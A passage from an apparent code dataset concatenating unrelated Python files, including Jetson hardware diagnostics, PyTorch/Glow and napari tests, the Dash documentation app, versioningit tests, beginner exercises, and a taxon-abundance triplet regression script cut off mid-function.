# CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING,
# BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS;
# OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE
# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE,
# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from diagnostic_msgs.msg import DiagnosticStatus, KeyValue
level_options = {
60: DiagnosticStatus.ERROR,
40: DiagnosticStatus.WARN,
20: DiagnosticStatus.OK,
}
def strfdelta(tdelta, fmt):
""" Print delta time
- https://stackoverflow.com/questions/8906926/formatting-python-timedelta-objects
"""
d = {"days": tdelta.days}
d["hours"], rem = divmod(tdelta.seconds, 3600)
d["minutes"], d["seconds"] = divmod(rem, 60)
return fmt.format(**d)
def board_status(hardware, board, dgtype):
"""
Board information and libraries installed
"""
values = []
for key, value in board['board'].items():
values += [KeyValue(key, "{value}".format(value=value))]
for key, value in board['libraries'].items():
values += [KeyValue("lib " + key, "{value}".format(value=value))]
# Make board diagnostic status
d_board = DiagnosticStatus(name='jetson_stats {type} config'.format(type=dgtype),
message='Jetpack {jetpack}'.format(jetpack=board['board']['Jetpack']),
hardware_id=hardware,
values=values)
return d_board
def disk_status(hardware, disk, dgtype):
"""
Status disk
"""
value=int(float(disk['used']) / float(disk['total']) * 100.0)
if value >= 90:
level = DiagnosticStatus.ERROR
elif value >= 70:
level = DiagnosticStatus.WARN
else:
level = DiagnosticStatus.OK
# Make board diagnostic status
d_board = DiagnosticStatus(level=level,
name='jetson_stats {type} disk'.format(type=dgtype),
message="{0:2.1f}GB/{1:2.1f}GB".format(disk['used'], disk['total']),
hardware_id=hardware,
values=[
KeyValue("Used", "{used:2.1f}GB".format(used=disk['used'])),
KeyValue("Total", "{total:2.1f}GB".format(total=disk['total'])),
])
return d_board
def cpu_status(hardware, cpu):
"""
Decode a cpu stats
Fields:
- 'status': 'ON'
- 'frq': 204
- 'name': 'CPU1'
- 'val': 8
- 'governor': 'schedutil'
"""
val = cpu['val']
status = cpu['status']
# Make Dianostic Status message with cpu info
d_cpu = DiagnosticStatus(name='jetson_stats cpu {name}'.format(name=cpu['name']),
message='{status} - {val}%'.format(val=val, status=status),
hardware_id=hardware,
values=[KeyValue("Status", "{status}".format(status=cpu['status'])),
KeyValue("Governor", "{governor}".format(governor=cpu['governor'])),
KeyValue("Val", "{val}%".format(val=val)),
KeyValue("Freq", "{frq}Mhz".format(frq=cpu['frq'])),
])
return d_cpu
def gpu_status(hardware, gpu):
"""
Decode and build a diagnostic status message
Fields:
- 'val': 10
"""
d_gpu = DiagnosticStatus(name='jetson_stats gpu',
message='{val}%'.format(val=gpu['val']),
hardware_id=hardware,
values=[KeyValue('Val', '{val}%'.format(val=gpu['val']))])
return d_gpu
def fan_status(hardware, fan, dgtype):
"""
Fan speed and type of control
Fields:
- 'status': 'ON'
- 'ctrl': True
- 'cap': 255
- 'tpwm': 0
- 'step': 100
- 'cpwm': 0
"""
if 'cpwm' in fan:
if 'ctrl' in fan:
ctrl = "Ta" if fan.get("ctrl", False) else "Tm"
else:
ctrl = "T"
label = "{ctrl}={target: >3}%".format(ctrl=ctrl, target=fan.get("tpwm", 0))
value = fan.get('cpwm', 0)
else:
label = ''
value = fan.get('tpwm', 0)
# Make fan diagnostic status
d_fan = DiagnosticStatus(name='jetson_stats {type} fan'.format(type=dgtype),
message='speed={speed}% {label}'.format(speed=value, label=label),
hardware_id=hardware,
values=[KeyValue("Status", "{status}".format(status=fan['status'])),
KeyValue("Temp control", "{ctrl}".format(ctrl=fan['ctrl'])),
KeyValue("Capacity", "{cap}%".format(cap=fan['cap'])),
])
return d_fan
def ram_status(hardware, ram, dgtype):
"""
Make a RAM diagnostic status message
Fields:
- 'use': 1325
- 'unit': 'M'
- 'tot': 3964
- 'lfb':
- 'nblock': 411
- 'unit': 'M'
- 'size': 4
"""
lfb_status = ram['lfb']
# value = int(ram['use'] / float(ram['tot']) * 100.0)
unit_name = 'G' # TODO improve with check unit status
# Make ram diagnostic status
d_ram = DiagnosticStatus(name='jetson_stats {type} ram'.format(type=dgtype),
message='{use:2.1f}{unit_ram}/{tot:2.1f}{unit_ram}B (lfb {nblock}x{size}{unit}B)'.format(
use=ram['use'] / 1000.0,
unit_ram=unit_name,
tot=ram['tot'] / 1000.0,
nblock=lfb_status['nblock'],
size=lfb_status['size'],
unit=lfb_status['unit']),
hardware_id=hardware,
values=[KeyValue("Use", "{use:2.1f}{unit}B".format(use=ram['use'] / 1000.0, unit=unit_name)),
KeyValue("Total", "{tot:2.1f}{unit}B".format(tot=ram['tot'] / 1000.0, unit=unit_name)),
KeyValue("lfb", "{nblock}x{size}{unit}B".format(nblock=lfb_status['nblock'],
size=lfb_status['size'],
unit=lfb_status['unit'])),
])
return d_ram
def swap_status(hardware, swap, dgtype):
"""
Make a swap diagnostic message
Fields:
- 'use': 0
- 'unit': 'M'
- 'tot': 1982
- 'cached':
- 'unit': 'M'
- 'size': 0
"""
swap_cached = swap.get('cached', {})
if swap.get('tot', 0) < 1000:
unit = swap['unit']
divider = 1.0
if swap.get('tot', 0) > 1000:
if 'k' == swap['unit']:
unit = 'M'
elif 'M' == swap['unit']:
unit = 'G'
divider = 1000.0
# Make swap diagnostic status
d_swap = DiagnosticStatus(name='jetson_stats {type} swap'.format(type=dgtype),
message='{use}{unit}B/{tot}{unit}B (cached {size}{unit}B)'.format(
use=swap.get('use', 0) / divider,
tot=swap.get('tot', 0) / divider,
size=swap_cached.get('size', '0'),
unit=swap_cached.get('unit', '')),
hardware_id=hardware,
values=[KeyValue("Use", "{use:2.1f}{unit}B".format(use=swap['use'] / divider, unit=unit)),
KeyValue("Total", "{tot:2.1f}{unit}B".format(tot=swap['tot'] / divider, unit=unit)),
KeyValue("Cached", "{size}{unit}B".format(size=swap_cached.get('size', '0'),
unit=swap_cached.get('unit', ''))),
])
return d_swap
def power_status(hardware, power):
"""
Make a Power diagnostic message
Fields:
- 'POM_5V_CPU': {'avg': 712, 'cur': 212}
- 'POM_5V_IN': {'avg': 1891, 'cur': 1271}
- 'POM_5V_GPU': {'avg': 31, 'cur': 0}}
"""
values = []
tot = {'cur': 0, 'avg': 0}
for key, value in power.items():
values += [KeyValue(key, "curr={curr}mW avg={avg}mW".format(curr=int(value['cur']), avg=int(value['avg'])))]
tot['cur'] += value['cur']
tot['avg'] += value['avg']
# Make voltage diagnostic status
d_volt = DiagnosticStatus(name='jetson_stats power',
message='curr={curr}mW avg={avg}mW'.format(curr=int(tot['cur']), avg=int(tot['avg'])),
hardware_id=hardware,
values=values)
return d_volt
def temp_status(hardware, temp):
"""
Make a temperature diagnostic message
Fields:
- 'AO': 40.0
- 'PMIC': 100.0
- 'iwlwifi': 36.0
- 'thermal': 31.0
- 'GPU': 31.0
- 'PLL': 28.5
- 'CPU': 31.0
"""
values = []
level = DiagnosticStatus.OK
list_options = sorted(level_options.keys(), reverse=True)
max_temp = 0
for key, value in temp.items():
values += [KeyValue(key, "{value:8.2f}C".format(value=value))]
if key != "PMIC":
max_temp = value if value > max_temp else max_temp
# Make status message
for k in list_options:
if max_temp >= k:
level = level_options[k]
break
# Make temperature diagnostic status
d_temp = DiagnosticStatus(level=level,
name='jetson_stats temp',
message='{n_temp} temperatures reads'.format(n_temp=len(temp)),
hardware_id=hardware,
values=values)
return d_temp
def emc_status(hardware, emc, dgtype):
"""
Make a EMC diagnostic message
Fields:
- 'val': 0
"""
# Make EMC diagnostic status
d_emc = DiagnosticStatus(name='jetson_stats {type} emc'.format(type=dgtype),
message='{val}%'.format(val=emc['val']),
hardware_id=hardware)
return d_emc
# EOF
|
StarcoderdataPython
|
24282
|
<filename>torch_glow/tests/nodes/quantized_batchnorm3d_relu_test.py<gh_stars>1-10
from __future__ import absolute_import, division, print_function, unicode_literals
import unittest
import torch
import torch.nn as nn
from tests.utils import jitVsGlow
from torch.quantization import (
DeQuantStub,
QConfig,
QuantStub,
convert,
fuse_modules,
observer,
prepare,
)
my_qconfig = QConfig(
activation=observer.default_observer,
weight=observer.HistogramObserver.with_args(dtype=torch.qint8, reduce_range=False),
)
class TestQuantizedBatchNorm3DRelu(unittest.TestCase):
def test_batchnorm_relu_basic(self):
"""
Basic test of the PyTorch 3D batchnorm RELU Node on Glow.
"""
class SimpleQuantizedBatchNormRelu(nn.Module):
def __init__(self, w, b, m, v):
super(SimpleQuantizedBatchNormRelu, self).__init__()
self.bn = torch.nn.BatchNorm3d(4)
self.relu = torch.nn.ReLU()
self.bn.weight = torch.nn.Parameter(w)
self.bn.bias = torch.nn.Parameter(b)
self.bn.running_mean = m
self.bn.running_var = v
self.q = QuantStub()
self.dq = DeQuantStub()
def forward(self, x):
qx = self.q(x)
qy = self.bn(qx)
qy_relu = self.relu(qy)
y = self.dq(qy_relu)
return y
C = 4
weight = torch.ones(C) + torch.rand(C) * 0.001
bias = torch.rand(C) * 0.0001
running_mean = torch.zeros(C)
running_var = torch.ones(C)
inputs = torch.randn((10, C, 2, 3, 4), requires_grad=False)
model = SimpleQuantizedBatchNormRelu(weight, bias, running_mean, running_var)
model.eval()
model.qconfig = my_qconfig
modules_to_fuse = [["bn", "relu"]]
fuse_modules(model, modules_to_fuse, inplace=True)
prepare(model, inplace=True)
model.forward(inputs)
convert(model, inplace=True)
# Because of the difference of quantization between PyTorch & Glow
# We set eps big enough.
# Batchnorm introduced great accuracy issues, which could create up to
# ~1e-2 difference in some rare cases. In order to prevent this test
# to be flaky, atol is set to be 0.1.
jitVsGlow(
model,
inputs,
expected_fused_ops={"quantized::batch_norm3d_relu"},
atol=1e-1,
use_fp16=True,
)
|
StarcoderdataPython
|
137505
|
from django.contrib import admin
from .models import Category, Post
admin.site.register(Post)
admin.site.register(Category)
|
StarcoderdataPython
|
12803561
|
from collections import OrderedDict
import dash_html_components as html
import dash_core_components as dcc
import dash_table
from dash.dependencies import Input, Output
from server import app, server
from tutorial import chapter_index
from tutorial import home
def create_contents(contents):
h = []
for i in contents:
if isinstance(i, list):
h.append(create_contents(i))
else:
h.append(html.Li(i))
return html.Ul(h)
chapters = {
'index': {
'url': '/',
'content': home.layout,
'name': 'Index',
'description': ''
}
}
chapters.update(chapter_index.chapters)
sections_ordered = OrderedDict()
sections_ordered['What\'s Dash?'] = [
'introduction',
'gallery'
]
sections_ordered['Dash Tutorial'] = [
'installation',
'getting-started',
'getting-started-part-2',
'state',
'graphing',
'shared-state',
'faqs'
]
sections_ordered['Component Libraries'] = [
'dash-core-components',
'dash-html-components',
'datatable',
'dashdaq'
]
sections_ordered['Creating Your Own Components'] = [
'react-for-python-developers',
'plugins',
'd3-plugins'
]
sections_ordered['Beyond the Basics'] = [
'performance',
'live-updates',
'external',
'urls',
'devtools'
]
sections_ordered['Production'] = [
'auth',
'deployment'
]
sections_ordered['Getting Help'] = [
# TODO add in the dash community forum
'support'
]
sections_ordered['Component Examples'] = [
'dropdown-examples',
'slider-examples',
'range-slider-examples',
'checklist-examples',
'input-examples',
'radio-item-examples',
'button-examples',
'datepickersingle-examples',
'datepickerrange-examples',
'markdown-examples',
'link-examples',
'tabs-example',
'textarea-examples',
'upload-examples',
'booleanswitch-examples',
'colorpicker-examples',
'gauge-examples',
'graduatedbar-examples',
'indicator-examples',
'knob-examples',
'leddisplay-examples',
'numericinput-examples',
'powerbutton-examples',
'precisioninput-examples',
'stopbutton-examples',
'slider-examples',
'tank-examples',
'thermometer-examples',
'toggleswitch-examples',
'darkthemeprovider-examples'
]
header = html.Div(
className='header',
children=html.Div(
className='container-width',
style={'height': '100%'},
children=[
html.A(html.Img(
src='https://cdn.rawgit.com/plotly/dash-docs/b1178b4e/images/dash-logo-stripe.svg',
className='logo'
), href='https://plot.ly/products/dash', className='logo-link'),
html.Div(className='links', children=[
html.A('pricing', className='link', href='https://plot.ly/dash/pricing'),
html.A('user guide', className='link active', href='/'),
html.A('plotly', className='link', href='https://plot.ly/'),
html.A(children=[html.I(className="fa fa-search")], className='link', href='/search')
])
]
)
)
app.title = 'Dash User Guide and Documentation - Dash by Plotly'
app.layout = html.Div(
[
# Stores used by examples.
dcc.Store(id='memory'),
dcc.Store(id='memory-output'),
dcc.Store(id='local', storage_type='local'),
dcc.Store(id='session', storage_type='session'),
header,
html.Div([
html.Div(id='wait-for-layout'),
html.Div([
html.Div(
html.Div(id='chapter', className='content'),
className='content-container'
),
], className='container-width')
], className='background'),
dcc.Location(id='location', refresh=False),
]
)
@app.callback(Output('chapter', 'children'),
[Input('location', 'pathname')])
def display_content(pathname):
if pathname is None:
return ''
if pathname.endswith('/') and pathname != '/':
pathname = pathname[:len(pathname) - 1]
if pathname.split('/')[-1] == 'all':
pdf_contents = []
table_of_contents = []
for section in sections_ordered.keys():
section_content = []
section_toc = []
section_id = section.replace(
' ', '-').replace(
'\'', '').replace(
'?', '').lower()
section_content.append(
html.H1(section, className='pdf-docs-section-name')
)
for chapter in sections_ordered[section]:
section_content.append(html.Div(
chapters[chapter]['content'],
className='pdf-docs-chapter',
id=chapter
))
section_toc.append(
html.A(chapter.replace('-', ' ').title(),
href='#{}'.format(chapter))
)
pdf_contents.append(html.Div(
section_content,
className='pdf-docs-section',
id=section_id
))
# add main section to table of contents
table_of_contents.append(
html.A(section,
href='#{}'.format(section_id),
className='toc-section-link')
)
# add all subsections
table_of_contents.append(
html.Div(section_toc,
className='toc-chapter-links')
)
# insert table of contents
return html.Div([
html.Div("Dash User Guide and Documentation",
id='pdf-docs-title'),
html.Div([html.H1('Table of Contents')] + table_of_contents,
id='pdf-docs-toc'),
html.Div(pdf_contents)
], id='pdf-docs')
matched = [c for c in chapters.keys()
if chapters[c]['url'] == pathname]
if matched and matched[0] != 'index':
if 'dash-deployment-server/' in pathname:
content = html.Div([
html.Div(chapters[matched[0]]['content']),
html.Hr(),
dcc.Link(html.A('Back to Dash Deployment Server Documentation'), href='/dash-deployment-server'),
html.Div(id='wait-for-page-{}'.format(pathname)),
])
elif 'datatable/' in pathname:
content = html.Div([
html.Div(chapters[matched[0]]['content']),
html.Hr(),
dcc.Link(
'Back to DataTable Documentation',
href='/datatable'
),
html.Br(),
dcc.Link(
'Back to Dash Documentation',
href='/'
),
html.Div(id='wait-for-page-{}'.format(pathname)),
])
elif 'cytoscape/' in pathname:
content = html.Div([
html.Div(chapters[matched[0]]['content']),
html.Hr(),
dcc.Link(
'Back to Cytoscape Documentation',
href='/cytoscape'
),
html.Br(),
dcc.Link(
'Back to Dash Documentation',
href='/'
),
html.Div(id='wait-for-page-{}'.format(pathname)),
])
else:
content = html.Div([
html.Div(chapters[matched[0]]['content']),
html.Hr(),
dcc.Link(html.A('Back to the Table of Contents'), href='/'),
html.Div(id='wait-for-page-{}'.format(pathname)),
])
else:
content = chapters['index']['content']
return content
app.index_string = '''
<!DOCTYPE html>
<html>
<head>
{%metas%}
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<meta
name="description"
content="Dash User Guide and Documentation. Dash is a Python framework for building analytical web apps in Python."
>
<title>{%title%}</title>
{%favicon%}
{%css%}
<!-- Google Tag Manager Tag -->
<script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
'https://www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-N6T2RXG');</script>
</head>
<body>
<!-- Google Tag Manager Tag -->
<noscript><iframe src="https://www.googletagmanager.com/ns.html?id=GTM-N6T2RXG"
height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript>
{%app_entry%}
<footer>
{%config%}
{%scripts%}
</footer>
</body>
</html>
'''
if __name__ == '__main__':
app.run_server(debug=True, threaded=True, port=8060)
|
StarcoderdataPython
|
8143204
|
import numpy as np
def test_big_2D_image(viewer_factory):
"""Test big 2D image with axis exceeding max texture size."""
view, viewer = viewer_factory()
shape = (20_000, 10)
data = np.random.random(shape)
layer = viewer.add_image(data, is_pyramid=False)
visual = view.layer_to_visual[layer]
assert visual.node is not None
if visual.MAX_TEXTURE_SIZE_2D is not None:
ds = np.ceil(np.divide(shape, visual.MAX_TEXTURE_SIZE_2D)).astype(int)
assert np.all(layer._transform_view.scale == ds)
def test_big_3D_image(viewer_factory):
"""Test big 3D image with axis exceeding max texture size."""
view, viewer = viewer_factory(ndisplay=3)
shape = (5, 10, 3_000)
data = np.random.random(shape)
layer = viewer.add_image(data, is_pyramid=False)
visual = view.layer_to_visual[layer]
assert visual.node is not None
if visual.MAX_TEXTURE_SIZE_3D is not None:
ds = np.ceil(np.divide(shape, visual.MAX_TEXTURE_SIZE_3D)).astype(int)
assert np.all(layer._transform_view.scale == ds)
|
StarcoderdataPython
|
1840179
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import re
def is_only_numeric(s, *args, **kwargs):
"""
True if string `s` contains nothing but numbers (and whitespace)
>>> is_only_numeric('Hi there')
False
>>> is_only_numeric('Number 9')
False
>>> is_only_numeric('42')
True
>>> is_only_numeric(' 4 3 2 1')
True
"""
non_nums_or_spaces = re.sub(r'[\d\s]', '', s)
return len(non_nums_or_spaces) == 0
def is_only_whitespace(s, *args, **kwargs):
"""
If the string only contains spaces and or tabs.
>>> is_only_whitespace('Hi there')
False
>>> is_only_whitespace('42')
False
>>> is_only_whitespace(' 7 ')
False
>>> is_only_whitespace(' ')
True
>>> is_only_whitespace(' ')
True
"""
for c in s:
if c not in (' ', '\t'):
return False
return True
def is_mixed_case(s):
"""
>>> is_mixed_case('HiThere')
True
>>> is_mixed_case('Hi There')
True
>>> is_mixed_case('hi there')
False
>>> is_mixed_case('h')
False
>>> is_mixed_case('H')
False
>>> is_mixed_case(None)
False
"""
if not isinstance(s, (str,)):
return False
mo_lo = re.search(r'[a-z]', s)
mo_hi = re.search(r'[A-Z]', s)
if ((mo_lo is None) or (mo_hi is None)):
return False
return True
def is_ip_address(s):
"""
>>> is_ip_address(None)
False
>>> is_ip_address('192.168.1.7')
True
>>> is_ip_address('192.168.1.7:1221')
False
>>> is_ip_address('192168.1.7')
False
>>> is_ip_address('foo')
False
"""
if s is None:
return False
pattern = r'\d+\.\d+\.\d+\.\d+'
mo = re.match(pattern, s)
if mo is None:
return False
if mo.group(0) == s:
return True
return False
## ---------------------
if __name__ == "__main__":
import doctest
print("[is.py] Testing...")
doctest.testmod()
print("Done.")
|
StarcoderdataPython
|
4826567
|
<filename>test/test_format.py
from datetime import datetime, timezone
from typing import Any, Dict
import pytest
from versioningit.basics import basic_format
from versioningit.core import VCSDescription
from versioningit.errors import ConfigError
BUILD_DATE = datetime(2038, 1, 19, 3, 14, 7, tzinfo=timezone.utc)
@pytest.mark.parametrize(
"description,version,next_version,params,r",
[
(
VCSDescription(
tag="v0.1.0",
state="distance",
branch="main",
fields={
"distance": 5,
"vcs": "g",
"rev": "abcdef0",
"build_date": BUILD_DATE,
},
),
"0.1.0",
"0.2.0",
{},
"0.1.0.post5+gabcdef0",
),
(
VCSDescription(
tag="v0.1.0",
state="dirty",
branch="main",
fields={
"distance": 0,
"vcs": "g",
"rev": "abcdef0",
"build_date": BUILD_DATE,
},
),
"0.1.0",
"0.2.0",
{},
"0.1.0+d20380119",
),
(
VCSDescription(
tag="v0.1.0",
state="distance-dirty",
branch="main",
fields={
"distance": 5,
"vcs": "g",
"rev": "abcdef0",
"build_date": BUILD_DATE,
},
),
"0.1.0",
"0.2.0",
{},
"0.1.0.post5+gabcdef0.d20380119",
),
(
VCSDescription(
tag="v0.1.0",
state="distance",
branch="main",
fields={
"distance": 5,
"vcs": "g",
"rev": "abcdef0",
"build_date": BUILD_DATE,
},
),
"0.1.0",
"0.2.0",
{"distance": "{next_version}.dev{distance}+{vcs}{rev}"},
"0.2.0.dev5+gabcdef0",
),
(
VCSDescription(
tag="v0.1.0",
state="distance",
branch="feature/acme",
fields={
"distance": 5,
"vcs": "g",
"rev": "abcdef0",
"build_date": BUILD_DATE,
},
),
"0.1.0",
"0.2.0",
{"distance": "{next_version}+{branch}.{rev}"},
"0.2.0+feature.acme.abcdef0",
),
(
VCSDescription(
tag="v0.1.0",
state="distance",
branch=None,
fields={
"distance": 5,
"vcs": "g",
"rev": "abcdef0",
"build_date": BUILD_DATE,
},
),
"0.1.0",
"0.2.0",
{"distance": "{next_version}+{branch}.{rev}"},
"0.2.0+None.abcdef0",
),
(
VCSDescription(
tag="v0.1.0",
state="weird",
branch="main",
fields={
"distance": 5,
"vcs": "g",
"rev": "abcdef0",
"build_date": BUILD_DATE,
},
),
"0.1.0",
"0.2.0",
{"weird": "{version}+{branch}.{build_date:%Y.%m.%d}"},
"0.1.0+main.2038.01.19",
),
],
)
def test_basic_format(
caplog: pytest.LogCaptureFixture,
description: VCSDescription,
version: str,
next_version: str,
params: Dict[str, Any],
r: str,
) -> None:
assert (
basic_format(
description=description,
version=version,
next_version=next_version,
**params
)
== r
)
assert caplog.record_tuples == []
def test_basic_format_invalid_state(caplog: pytest.LogCaptureFixture) -> None:
with pytest.raises(ConfigError) as excinfo:
basic_format(
description=VCSDescription(
tag="v0.1.0",
state="weird",
branch="main",
fields={
"distance": 5,
"vcs": "g",
"rev": "abcdef0",
"build_date": BUILD_DATE,
},
),
version="0.1.0",
next_version="0.2.0",
)
assert str(excinfo.value) == (
"No format string for 'weird' state found in tool.versioningit.format"
)
assert caplog.record_tuples == []
|
StarcoderdataPython
|
11249274
|
default_app_config = 'autodrp.apps.AutoDRPConfig'
|
StarcoderdataPython
|
3442805
|
#71 编写input()和output()函数输入,输出5个学生的数据记录
student = []
def input_stu(stu, num):
for i in range(5):
stu.append(['', '', []])
for i in range(num):
stu[i][0] = input('input the num:\n')
stu[i][1] = input('input the name:\n')
for j in range(2):
stu[i][2].append(int(input('input the score:\n')))
def output_stu(stu):
for i in range(len(stu)):
print('%-6s%-10s' % (stu[i][0], stu[i][1]))
for j in range(len(stu[i][2])):
print('%-8d' % stu[i][2][j])
#input_stu(student, 3)
#output_stu(student)
#72 创建一个链表
def create_link():
pLink = []
for i in range(20):
pLink.append(i)
print('this is the pLink', pLink)
#create_link()
#73 题目:反向输出一个链表。
def create_reverse_link():
pLink = []
for i in range(20):
pLink.append(i)
pLink.reverse()
print('this is the pLink to reverse print: ', pLink)
#create_reverse_link()
#74. 题目:列表排序及连接。
def sorted_and_linked():
head = [1,3,2,5,9,110,67]
tail = [111,45,89]
head.sort()
print('this is sorted the head: ', head)
#head + tail 也可以
head.extend(tail)
print('this is to extend the head and tail :', head)
#sorted_and_linked()
#75. 放松一下,算一道简单的题目
# 简单的判断题不想写
#76. 题目:编写一个函数,输入n为偶数时,调用函数求1/2+1/4+...+1/n,当输入n为奇数时,调用函数1/1+1/3+...+1/n
def sum_num(n):
x = 0
if n % 2 == 0:
x = 2
else:
x = 1
sum_x = 0
for i in range(x, n+1, 2):
sum_x += 1/i
print('this is the sum_x: %f ' % sum_x)
sum_num(6)
#77. 题目:循环输出列表
def rotation_list():
ary = [1, 2, 4, 5, 3]
for value in enumerate(ary):
print('this is the key: %d , value: %d' %(value[0], value[1]))
rotation_list()
#78 题目:找到年龄最大的人,并输出。请找出程序中有什么问题。
def find_max_age():
persons = {"a": 18, "b": 20, "c": 34}
max_person = ""
for x in persons.keys():
if max_person == '':
max_person = x
if persons[x] > persons[max_person]:
max_person = x
print("this is the max person %s and age is %d " % (max_person, persons[max_person]) )
find_max_age()
#79 题目:字符串排序。
def sort_str(str1, str2):
if str1 < str2:
return str1, str2
else:
return str2, str1
print(sort_str('b', 'a'))
#80 题目:海滩上有一堆桃子,五只猴子来分。第一只猴子把这堆桃子平均分为五份,多了一个,
# 这只猴子把多的一个扔入海中,拿走了一份。
# 第二只猴子把剩下的桃子又平均分成五份,又多了一个,它同样把多的一个扔入海中,拿走了一份,
# 第三、第四、第五只猴子都是这样做的,问海滩上原来最少有多少个桃子?
def distribution_things(n, x):
if x == 0:
return n
n = n * 5 + 1
x = x-1
return distribution_things(n, x)
print(distribution_things(1, 5))
|
StarcoderdataPython
|
6595024
|
<filename>linear_model/model_pick/random_forest/triplets_wei.py<gh_stars>0
import copy
import itertools
import re
import sys
from difflib import SequenceMatcher
import numpy as np
import pandas as pd
import scipy
import statsmodels.formula.api as sm
global tax_thr
tax_thr = 0
class Graph:
def __init__(self):
self.nodes = []
self.len = 0
self.wh_len = 0
def add_node(self, n):
present = self.find(n)
if present is None:
self.nodes.append(Node(n))
self.nodes[-1].index = len(self.nodes) - 1
self.len += 1
self.wh_len += 1
return (self.nodes[-1])
else:
return (present)
def find(self, name):
for n in self.nodes:
if n.name == name:
return (n)
return (None)
def add_edge(self, name1, name2):
N = [name1, name2]
present = [self.find(el) for el in N]
for i in range(2):
if present[i] is None:
new_node = self.add_node(N[i])
present[i] = new_node
a = self.find(name1)
b = self.find(name2)
a.neigh.append(b)
b.neigh.append(a)
def add_weighted_edge(self, i, j, pairG):
if (pairG.nodes[i] in pairG.nodes[j].neigh):
self.nodes[i].neigh += [self.nodes[j]]
self.nodes[j].neigh += [self.nodes[i]]
self.nodes[j].neigh = list(set(self.nodes[j].neigh))
self.nodes[i].neigh = list(set(self.nodes[i].neigh))
self.nodes[j].weight[self.nodes[i]] += 1
self.nodes[i].weight[self.nodes[j]] += 1
class Node:
def __init__(self, name):
self.name = name
self.neigh = []
self.color = 'white'
self.index = None
self.weight = {}
# No dots in dimnames!
# in: data with meta_data on pair graph (practically, an edge list), path to counts table
# out: edges list for truplets, table with triple models parameters
def reduce_to_triplets(fstats, counts):
##################################
# Takes in a meta-df for double models!
def table_to_graph(df):
G = Graph()
for i in range(1, len(df)):
edge = df.iloc[i]
G.add_edge(edge[0], edge[1])
return (G)
def tr_neighs(root):
closest = [list(x) for x in itertools.combinations(root.neigh, 2)]
far = {k: k.neigh for k in root.neigh if k.neigh != root}
temp = []
for el in far:
for i in far[el]:
temp.append([el] + [i])
all = closest + temp
all = [el for el in all if (root not in el)]
all = [el + [root] for el in all]
return (all)
def remove_zeroes(df):
# ((df.T == 2).all() == False).all()
# is true, if no lines have zero values
if not ((df.T == 0).all() == False).all():
# Remember one zero line
zero_line = df[(df.T == 0).all()].iloc[0]
# Now remove all zeros
df = df[(df.T != 0).any()]
# And add our zero-line
df.append(zero_line)
return (df)
def md_remove_outliers(df):
inv_cov = df.cov().as_matrix()
means = df.mean().as_matrix()
md = df.apply((lambda x: scipy.spatial.distance.mahalanobis(x, means, inv_cov)), axis=1)
# Q =scipy.stats.chi2.cdf(md, df.shape[1])
Q = scipy.stats.chi2.ppf(0.975, df.shape[1])
df = df[md < Q]
return (df)
def remove_outliers(df):
q = df.quantile([0.025, 0.975])
filt_df = df[(df.iloc[:, 0] > q.iloc[0, 0]) &
(df.iloc[:, 1] > q.iloc[0, 1]) &
(df.iloc[:, 2] > q.iloc[0, 2]) &
(df.iloc[:, 0] < q.iloc[1, 0]) &
(df.iloc[:, 1] < q.iloc[1, 1]) &
(df.iloc[:, 2] < q.iloc[1, 2])]
return (filt_df)
all_models = pd.DataFrame([np.nan] * 6,
index=['Response', 'Predictor1', 'Predictor2', 'Coef_p1', 'Coef_p2', 'Intercept']).T
all_models.drop(0, 0)
# Col: species; Row: samples
do = table_to_graph(fstats)
# Recursion depth issue
# tr = copy.deepcopy(do)
tr = table_to_graph(fstats)
# Add zero weight to all edges
# Later this weight will be showing the number of 3-models
# with this particular pair of taxons
# Then erase all edges, as we are making a new graph,
# although containing all the vertices for double graph
for n in tr.nodes:
n.weight = {x: 0 for x in n.neigh}
n.neigh = []
print('Nodes in pair graph: ' + str(do.len))
# For each node see all possible triplets that contain it
# Then check if corresponding triplet linear models are better than pair-models
# If they are --
computed = []
for i in range(do.len):
sets = tr_neighs(do.nodes[i])
# Get IDs of all vertices in all triplets to quickly look them up in our graph
temp = copy.copy(sets)
# Remove set if it has 1 black vertex
# Black vertex means all triplets containing have been accounted for previously
for el in temp:
colors = [j.color for j in el]
if 'black' in colors:
sets.remove(el)
# zip(set_indices, set_names)
indices_and_names = [([el.index for el in j],[el.name for el in j]) for j in sets]
# Now calculate models for the sets
# for ind, na in zip(set_indices, set_names):
for ind, na in indices_and_names:
pairs = list(itertools.permutations([na[0],na[1],na[2]], 2))
# Make sure there are no dublicates
test = any([x[0] == x[1] for x in pairs])
taxons = ['s__','g__', 'f__', 'o__', 'c__', 'p__']
tax_name = taxons[tax_thr]
if not(test):
for pair in pairs:
temp = SequenceMatcher(None, pair[0],pair[1])
temp = temp.find_longest_match(0, len(pair[0]), 0, len(pair[1]))
lcs = pair[0][temp[0]:(temp[0] + temp[2])]
if (tax_name in lcs):
test = True
if test:
continue
# How this line even works?
# Is counts a df? Or what?
temp = counts[[na[0], na[1], na[2]]]
temp = remove_zeroes(temp)
temp = remove_outliers(temp)
orders = [[na[i]] + [p for p in na if p != na[i]] for i in range(len(na))]
for order in orders:
resp = order[0]
pred1 = order[1]
pred2 = order[2]
text = resp + ' ~ ' + pred1 + ' + ' + pred2
